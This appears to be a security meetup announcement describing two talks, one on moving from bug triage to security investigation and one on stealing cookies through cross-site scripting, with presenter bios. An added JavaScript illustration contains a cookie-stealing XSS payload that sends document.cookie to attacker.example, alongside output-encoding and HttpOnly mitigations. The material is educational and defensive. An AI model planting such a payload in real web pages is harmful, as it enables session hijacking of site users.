Monthly Meeting (Remote)
Details
Hey all, this month we will be trying something a little different. Our Monthly Meeting will be held remotely (via Zoom), so please make sure you RSVP. A link will be sent out to those who RSVP as we get closer to the meeting time.
Topic: When Is A Bug Not A Bug?
This topic helps guide people from a Dev & QA troubleshooting mindset into a Security investigation mindset. There are times where the two approaches overlap and times where they diverge; knowing when to branch in which direction is an important real-world skill. That branching is largely informed by Impact.
Presenter: Francisco Slavin
Francisco got started building secure systems in the cross-domain government world and then went into the broader world of Vulnerability Management and AppSec while working at Rapid7. He built the consulting practice, training, and product cert for AppSpider, got looped into some marketing and then ran away to live on a mountain in New Zealand and learn to paraglide for a while. Most recently he lived as a freelance consultant coaching teams on how to repeatedly and reliably implement best practices and beyond. He is now the Director of Product Security (DPS) for the Data & Insights division of Tyler Technologies and is very happy that he was able to backronym his job title to match an old videogame acronym.
Topic: Using XSS to Steal Cookies
Attention: This talk is for educational purposes only!
In this live demonstration, you will learn what a "cookie" is with regard to web browsing and some basic authentication. You will also learn some high-level principles of cross-site scripting (XSS) and how said "cookies" can be stolen via XSS. And lastly, you will learn a few ways to mitigate these types of attacks.
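As an added illustration of the talk's three points (this is example code written for this page, not the presenter's demo), the block below shows a reflected-XSS handler that echoes a query parameter into a page, the cookie-stealing payload such a hole admits, and the two mitigations most people reach for first: HTML-encoding untrusted output, and setting the session cookie HttpOnly so script in the page cannot read it. The "page", the attacker host (attacker.example) and document.cookie are all constructed strings, so it runs under Node without a browser.

```javascript
// Added example, not code from the talk or its presenter.
// Everything here is a constructed simulation: the rendered "page", the
// attacker host and document.cookie are plain strings so this runs in Node.

// Minimal HTML encoder for text content; this is the output-encoding mitigation.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable handler: reflects the ?name= parameter straight into the page.
function renderVulnerable(name) {
  return `<h1>Hello, ${name}</h1>`;
}

// Hardened handler: same page, but the untrusted value is encoded first.
function renderSafe(name) {
  return `<h1>Hello, ${escapeHtml(name)}</h1>`;
}

// A classic cookie-stealing payload: ships document.cookie to an
// attacker-controlled host (attacker.example is a hypothetical hostname).
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// Crude stand-in for the browser parser: did a script tag make it into the
// markup? The templates above contain none, so any hit came from user input.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Build a Set-Cookie header. HttpOnly keeps the cookie out of document.cookie,
// so even a successful XSS cannot read it; Secure and SameSite ride along.
function sessionCookieHeader(value, { httpOnly = true } = {}) {
  const parts = [`session=${value}`, 'Path=/', 'Secure', 'SameSite=Lax'];
  if (httpOnly) parts.push('HttpOnly');
  return parts.join('; ');
}

// Simulate what page script sees via document.cookie: every cookie except
// those flagged HttpOnly, which mirrors real browser behaviour.
function documentCookie(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(';')[0])
    .join('; ');
}

// Run the three scenarios and report what the attacker would get.
function demo() {
  const cookies = [sessionCookieHeader('abc123'), 'theme=dark; Path=/'];
  return {
    injectedInVulnerable: containsInjectedScript(renderVulnerable(PAYLOAD)),
    injectedInSafe: containsInjectedScript(renderSafe(PAYLOAD)),
    visibleToScript: documentCookie(cookies),
  };
}

console.log(demo());
```

With the session cookie marked HttpOnly, the payload still executes in the vulnerable page but `document.cookie` only yields `theme=dark`; with output encoding, the payload never becomes a script element at all. Both controls belong together, since HttpOnly does nothing against an XSS that simply drives the victim's session from inside the page.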
Presenter: Dant35An0nym0u5
From Notepad to Dreamweaver to Flash to the CMS, this failed web developer turned hacker back in the early 2000s. It wasn't until his own apps began getting hacked that he turned to application security and never looked back. A man of many hats, mostly white, he is currently a Security Advisor for Rapid7's Managed AppSec team. Before joining Rapid7, he was a freelance web application penetration tester, and if you go back even further, you may have seen him in a Halo tournament or two. https://github.com/nodisassemble
